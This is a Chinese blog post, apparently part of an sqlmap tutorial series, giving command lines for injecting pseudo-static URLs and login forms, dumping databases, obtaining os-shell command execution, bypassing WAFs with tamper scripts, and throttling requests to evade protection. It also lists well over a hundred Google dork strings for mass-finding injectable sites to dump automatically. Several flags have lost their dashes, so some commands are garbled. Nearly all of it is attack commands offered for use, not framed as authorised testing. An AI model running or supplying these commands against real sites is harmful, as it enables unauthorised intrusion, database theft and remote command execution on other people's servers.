Sqlmap渗透注入 整合(2)

伪静态注入

  1. 1.在存在注入的地方加上*,然后获取数据库
  2. sqlmap.py “http://www.xx.com/index.php/index/view/id/40*.html” dbs
  3.  
  4. 2.获取数据库中的表
  5. sqlmap.py “http://www.xx.com/index.php/index/view/id/40*.html” 数据库名 tables
  6.  
  7. 3.获取数据库中的字段
  8. sqlmap.py “http://www.xx.com/index.php/index/view/id/40*.html” 数据库名 表名 columns
  9.  
  10. 4.获取字段的内容
  11. sqlmap.py “http://www.xx.com/index.php/index/view/id/40*.html” 数据库名 表名 “字段名1,字段名2” dump

 

POST登陆框注入

  1. 1.burpsuite + sqlmap
  2. 利用burpsuite抓包保存为txt,利用sqlmap指定文本注入(使用方法请自行百度)
  3. 注入点:http://www.xx.com/Login.asp
  4. sqlmap.py r test.txt Password
  5.  
  6. 2.自动注册表单,截取数据。(直接在后面加[–forms])
  7. sqlmap “http://www.xx.com/Login.asp” forms
  8.  
  9. 3.指定参数
  10. sqlmap.py “http://www.xx.com/Login.asp” data “标签名1=数据1&标签名2=数据2&标签名3=数据3…”
  11. 注:填写的数据可以随意写,但标签名一定要与input标签中的name一致,不同的标签名对应不同的name
  12. sqlmap “http://www.xx.com/Login.asp” data “Username=1&Password=1”
  13. 注:UsernamePassword分别为Login.asp页面中的两个输入框的名字,将鼠标移动到输入框上面右击选择“审查元素”即可看到,每台网页的Login页面都不一定是一样的,渗透老鸟应该很容易懂。本人不才,可能解释的不太清楚。

 

交互写Shell及命令执行

  1. 1.执行系统命令(windows系统): oscmd=ipconfig
  2. sqlmap.py “http://www.xx.com/aa.aspx?id=123” oscmd=ipconfig
  3. 执行后根据提示选择网站语言
  4. 然后回车,指定目标站点根目录,然后继续回车即可完整执行命令
  5.  
  6. 2.执行shell osshell
  7. sqlmap.py “http://www.xx.com/aa.aspx?id=123” osshell
  8. 执行后根据提示选择网站语言,然后回车,指定目标站点根目录后回车,输入命令即可执行,也可起到提权的作用。
  9. 执行命令后会在网站根目录生成两个临时文件:tmpbxbxz.php tmpuoiuz.php(此文件为上传页面)
  10. 注意:需要有足够大的权限方可执行命令
  11. 查看网站权限
  12. sqlmap.py “http://www.xx.com/aa.aspx?id=123” privileg

 

注入点之Google搜索(附关键字)

  1. 利用Google Dorks字符串找到可注入的网站
  2. 使用谷歌爬注入点必须本机可以直接访问谷歌才能使用该语句,更改hosts文件即可访问谷歌。
  3.  
  4. sqlmap.py g(g即为谷歌的意思) 加上搜索引擎的语言(即google关键字)
  5.  
  6. 使用示例:
  7. 1.sqlmap.py “inurl:php?id=”
  8.  
  9. 2.sqlmap.py “inurl:php?id=” dumpall batch
  10. google搜索注入点 自动跑出所有字段
  11.  
  12. 3.sqlmap.py “inurl:关键字 intitle:关键字 intext:关键字……(批量注入关键字只要存在的,能扫描到的都可以自己构造,主要是看你怎么去运用)” batch (后面的参数也一样 根据自身情况而定,可以自己构造,也可以继续摸索新的方法)
  13. 部分关键字(根据自己需要的去使用):
  14. inurl:item_id=        
  15. inurl:review.php?id=        
  16. inurl:hosting_info.php?id=
  17. inurl:newsid=        
  18. inurl:iniziativa.php?in=        
  19. inurl:gallery.php?id=
  20. inurl:trainers.php?id=        
  21. inurl:curriculum.php?id=        
  22. inurl:rub.php?idr=
  23. inurl:newsfull.php?id=        
  24. inurl:labels.php?id=        
  25. inurl:view_faq.php?id=
  26. inurl:news_display.php?getid=        
  27. inurl:story.php?id=        
  28. inurl:artikelinfo.php?id=
  29. inurl:index2.php?option=        
  30. inurl:look.php?ID=        
  31. inurl:detail.php?ID=
  32. inurl:readnews.php?id=        
  33. inurl:newsone.php?id=        
  34. inurl:index.php?=
  35. inurl:top10.php?cat=        
  36. inurl:aboutbook.php?id=        
  37. inurl:profile_view.php?id=
  38. inurl:newsone.php?id=        
  39. inurl:material.php?id=        
  40. inurl:category.php?id=
  41. inurl:event.php?id=        
  42. inurl:opinions.php?id=        
  43. inurl:publications.php?id=
  44. inurl:productitem.php?id=        
  45. inurl:announce.php?id=        
  46. inurl:fellows.php?id=
  47. inurl:sql.php?id=        
  48. inurl:rub.php?idr=        
  49. inurl:downloads_info.php?id=
  50. inurl:index.php?catid=        
  51. inurl:galeri_info.php?l=        
  52. inurl:prod_info.php?id=
  53. inurl:news.php?catid=        
  54. inurl:tekst.php?idt=        
  55. inurl:shop.php?do=part&id=
  56. inurl:index.php?id=        
  57. inurl:newscat.php?id=        
  58. inurl:productinfo.php?id=
  59. inurl:news.php?id=        
  60. inurl:newsticker_info.php?idn=        
  61. inurl:collectionitem.php?id=
  62. inurl:index.php?id=        
  63. inurl:rubrika.php?idr=        
  64. inurl:band_info.php?id=
  65. inurl:trainers.php?id=        
  66. inurl:rubp.php?idr=        
  67. inurl:product.php?id=
  68. inurl:buy.php?category=        
  69. inurl:offer.php?idf=        
  70. inurl:releases.php?id=
  71. inurl:article.php?ID=        
  72. inurl:art.php?idm=        
  73. inurl:ray.php?id=
  74. inurl:play_old.php?id=        
  75. inurl:title.php?id=        
  76. inurl:produit.php?id=
  77. inurl:declaration_more.php?decl_id=        
  78. inurl:news_view.php?id=        
  79. inurl:pop.php?id=
  80. inurl:pageid=        
  81. inurl:select_biblio.php?id=        
  82. inurl:shopping.php?id=
  83. inurl:games.php?id=        
  84. inurl:humor.php?id=        
  85. inurl:productdetail.php?id=
  86. inurl:page.php?file=        
  87. inurl:aboutbook.php?id=        
  88. inurl:post.php?id=
  89. inurl:newsDetail.php?id=        
  90. inurl:ogl_inet.php?ogl_id=        
  91. inurl:viewshowdetail.php?id=
  92. inurl:gallery.php?id=        
  93. inurl:fiche_spectacle.php?id=        
  94. inurl:clubpage.php?id=
  95. inurl:article.php?id=        
  96. inurl:communique_detail.php?id=        
  97. inurl:memberInfo.php?id=
  98. inurl:show.php?id=        
  99. inurl:sem.php3?id=        
  100. inurl:section.php?id=
  101. inurl:staff_id=        
  102. inurl:kategorie.php4?id=        
  103. inurl:theme.php?id=
  104. inurl:newsitem.php?num=        
  105. inurl:news.php?id=        
  106. inurl:page.php?id=
  107. inurl:readnews.php?id=        
  108. inurl:index.php?id=        
  109. inurl:shreddercategories.php?id=
  110. inurl:top10.php?cat=        
  111. inurl:faq2.php?id=        
  112. inurl:tradeCategory.php?id=
  113. inurl:historialeer.php?num=        
  114. inurl:show_an.php?id=        
  115. inurl:product_ranges_view.php?ID=
  116. inurl:reagir.php?num=        
  117. inurl:preview.php?id=        
  118. inurl:shop_category.php?id=
  119. inurl:StrayQuestionsView.php?num=        
  120. inurl:loadpsb.php?id=        
  121. inurl:transcript.php?id=
  122. inurl:forum_bds.php?num=        
  123. inurl:opinions.php?id=        
  124. inurl:channel_id=
  125. inurl:game.php?id=        
  126. inurl:spr.php?id=        
  127. inurl:aboutbook.php?id=
  128. inurl:view_product.php?id=        
  129. inurl:pages.php?id=        
  130. inurl:preview.php?id=
  131. inurl:newsone.php?id=        
  132. inurl:announce.php?id=        
  133. inurl:loadpsb.php?id=
  134. inurl:sw_comment.php?id=        
  135. inurl:clanek.php4?id=        
  136. inurl:pages.php?id=
  137. inurl:news.php?id=        
  138. inurl:participant.php?id=        
  139. inurl:avd_start.php?avd=        
  140. inurl:download.php?id=        
  141. inurl:event.php?id=        
  142. inurl:main.php?id=        
  143. inurl:productitem.php?id=        
  144. inurl:review.php?id=        
  145. inurl:sql.php?id=        
  146. inurl:chappies.php?id=        
  147. inurl:material.php?id=        
  148. inurl:read.php?id=        
  149. inurl:clanek.php4?id=        
  150. inurl:prod_detail.php?id=        
  151. inurl:announce.php?id=        
  152. inurl:viewphoto.php?id=        
  153. inurl:chappies.php?id=        
  154. inurl:article.php?id=        
  155. inurl:read.php?id=        
  156. inurl:person.php?id=        
  157. inurl:viewapp.php?id=        
  158. inurl:productinfo.php?id=        
  159. inurl:viewphoto.php?id=        
  160. inurl:showimg.php?id=        
  161. inurl:rub.php?idr=        
  162. inurl:view.php?id=        
  163. inurl:galeri_info.php?l=        
  164. inurl:website.php?id=

 

绕过WAF防火墙

  1. 注:此方法适用于在注入的时候出现频繁报错时或者可以确定网站有注入点的时候。
  2.  
  3. batch:要求不对目标写入
  4. tamper:使用干预脚本
  5. 3(3为等级)
  6. 注意:若不使用3等级无法继续下一步操作。
  7. 本人收集的脚本:
  8. space2comment.py        charunicodeencode.py        charencode.py
  9. space2morehash.py                space2hash.py                base64encode.py                charencode.py
  10. 替换空格和关键字为“/*!0”脚本: halfversionedmorekeywords.py
  11.  
  12. 获取当前数据库,使用脚本绕过WAF防火墙
  13. sqlmap.py -u “http://www.xx.com/a.asp?id=123” -v 3 –dbs –batch –tamper “脚本”
  14. 示例1:sqlmap.py -u “http://www.xx.com/a.asp?id=123” -v 3 –dbs –batch –tamper “space2morehash.py”
  15. 示例2:sqlmap.py -u “http://www.xx.com/a.asp?id=123” -v 3 –dbs –batch –tamper “space2hash.py”
  16. 示例3:sqlmap.py -u “http://www.xx.com/a.asp?id=123” -v 3 –dbs –batch –tamper “base64encode.py”
  17. 示例4:sqlmap.py -u “http://www.xx.com/a.asp?id=123” -v 3 –dbs –batch –tamper “charencode.py”

 

请求延时(针对防火墙、Web本身的保护程序等)

  1. 参数一:–delay 1(1秒) 表示延时1秒进行注入,1可根据自己情况更改
  2. sqlmap.py “http://www.xx.com/index.php/index/view/id/40*.html” delay 1(1是时间,1秒,自己设置)
  3.  
  4. 例:sqlmap.py “http://www.xx.com/index.php/index/view/id/40*.html” delay 1
  5.  
  6. 参数二:-safefreq 提供一个安全不错误的连接,每次测试请求之后都会再访问一边安全连接。
  7. sqlmap.py “http://www.xx.com/index.php/index/view/id/40*.html” safefreq 20(20为次数,自己设定)
  8. 例:sqlmap.py “http://www.xx.com/index.php/index/view/id/40*.html” safefreq 3
暂无评论

发送评论 编辑评论


				
上一篇
下一篇